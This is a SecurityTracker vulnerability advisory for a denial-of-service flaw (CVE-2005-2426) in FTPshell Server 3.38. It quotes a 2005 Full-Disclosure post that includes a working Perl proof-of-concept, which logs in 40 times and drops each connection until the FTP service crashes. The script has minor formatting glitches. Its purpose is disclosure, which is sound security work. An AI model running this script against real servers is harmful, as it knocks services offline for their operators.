FTPshell Bug in Handling Closed Connections Lets Remote Users Crash the FTP Service
|
|
SecurityTracker Alert ID: 1014580
|
|
SecurityTracker URL: http://securitytracker.com/id?1014580
|
|
CVE Reference: CVE-2005-2426
(Links to External Site)
|
Updated: Jul 6 2008
|
Original Entry Date: Jul 26 2005
|
Impact: Denial of service via network
|
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 3.38
|
Description: A vulnerability was reported in FTPshell. A remote authenticated user can cause denial of service conditions.
A remote authenticated user, including an anonymous user, can login to the FTP service and then close the connection without using
the QUIT command. Repeating this 38 additional times will cause the 'ftpshelld.exe' FTP service to crash.
Reed Arvin reported
this vulnerability.
|
Impact: A remote authenticated user can cause the FTP service to crash.
|
Solution: No solution was available at the time of this entry. The vendor is working on a patch.
|
Vendor URL: www.ftpshell.com/ (Links to External Site)
|
Cause: Exception handling error
|
Underlying OS: Windows (Any)
|
Reported By: Reed Arvin <reedarvin@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 25 Jul 2005 19:50:41 -0700
From: Reed Arvin <reedarvin@gmail.com>
Subject: [Full-disclosure] Denial of service vulnerability in FTPshell
|
Summary:
Denial of service vulnerability in FTPshell Server Version 3.38
(http://www.ftpshell.com/)
Details:
Logging into the FTP server successfully and then closing the
connection (without using the QUIT command) 39 times will cause the
ftpshelld.exe process will die.
Vulnerable Versions:
FTPshell Server Version 3.38
Patches/Workarounds:
The vendor was notified of the issue. A patch will be release shorly.
The patch will be made available via the vendor's web site
(http://www.ftpshell.com/).
Exploits:
Run the following PERL script against the server. The corresponding
process will die.
#===== Start FTPShell_FTPDOS.pl =====
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
# FTPShell_FTPDOS.pl 127.0.0.1 hello moto
# FTPshell Server Version 3.38
# Download:
# http://www.ftpshell.com/
################################################
use IO::Socket;
use Win32;
use strict;
my($i) = "";
my($socket) = "";
for ($i = 1; $i <= 40; $i++)
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Login \#$i\n";
Win32::Sleep(300);
print $socket "USER $ARGV[1]\r\n";
Win32::Sleep(100);
print $socket "PASS $ARGV[2]\r\n";
Win32::Sleep(100);
print $socket "PORT 127,0,0,1,18,12\r\n";
Win32::Sleep(100);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== Start FTPShell_FTPDOS.pl =====
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
